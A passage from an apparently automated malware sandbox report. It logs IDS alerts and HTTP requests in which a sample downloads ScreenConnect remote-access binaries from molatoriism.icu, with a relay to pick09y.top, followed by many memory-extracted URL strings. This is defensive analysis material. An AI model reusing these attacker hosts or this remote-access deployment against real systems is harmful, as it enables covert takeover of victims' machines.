                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49900
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49925
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.9:50001
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: molatoriism.icu
                  Source: global trafficDNS traffic detected: DNS query: pick09y.top
                  Source: svchost.exe, 00000008.00000002.2595293916.000002001D95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2594659403.000002001D072000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000008.00000002.2595421751.000002001DE1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 00000008.00000002.2594733951.000002001D081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: svchost.exe, 00000007.00000002.2596891843.000002EA7E60F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594952683.000002001D0D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.2242687962.000001676679F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: dfsvc.exe, 00000001.00000002.2244765941.00000167686C4000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2245613377.00000167687AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabQ
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: svchost.exe, 00000008.00000003.1398428930.000002001D953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200
                  Source: svchost.exe, 00000008.00000003.1398123474.000002001D956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2595165848.000002001D900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                  Source: svchost.exe, 00000008.00000003.1398602624.000002001D929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
                  Source: svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdU
                  Source: svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcurity
                  Source: svchost.exe, 00000008.00000003.1413529999.000002001D955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdence
                  Source: svchost.exe, 00000008.00000003.1413529999.000002001D955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdwsse:S
                  Source: svchost.exe, 00000008.00000003.1413529999.000002001D955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2595165848.000002001D900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                  Source: svchost.exe, 00000008.00000003.1398602624.000002001D929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
                  Source: svchost.exe, 00000008.00000003.1413529999.000002001D955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAA
                  Source: svchost.exe, 00000008.00000003.1413529999.000002001D955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAABppHKnfH
                  Source: svchost.exe, 00000008.00000002.2595165848.000002001D900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdd
                  Source: svchost.exe, 00000008.00000003.1398478634.000002001D95D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1398123474.000002001D956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecuri
                  Source: svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdhema
                  Source: svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2
                  Source: svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoa
                  Source: svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxml
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: dfsvc.exe, 00000001.00000002.2244136075.0000016766F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/Mic
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E350000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://molatoriism.icu
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.2245613377.00000167687B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.2245876378.0000016768820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crlLf
                  Source: svchost.exe, 00000008.00000002.2595421751.000002001DE1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594733951.000002001D081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000008.00000002.2595293916.000002001D95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy=80601
                  Source: svchost.exe, 00000008.00000002.2595293916.000002001D95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyc
                  Source: svchost.exe, 00000008.00000002.2595293916.000002001D95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scrf
                  Source: svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scst
                  Source: svchost.exe, 00000008.00000002.2595293916.000002001D95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000008.00000002.2594659403.000002001D072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594952683.000002001D0D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustnce
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674DF41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.2597190273.0000000001D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: svchost.exe, 00000008.00000003.1398123474.000002001D956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.(
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E56B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E55B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E26B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E56B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674DFCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674DFCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000008.00000003.1364648785.000002001D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000008.00000003.1364648785.000002001D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364350500.000002001D957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                  Source: svchost.exe, 00000007.00000003.1354797941.000002EA7E800000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.ecur
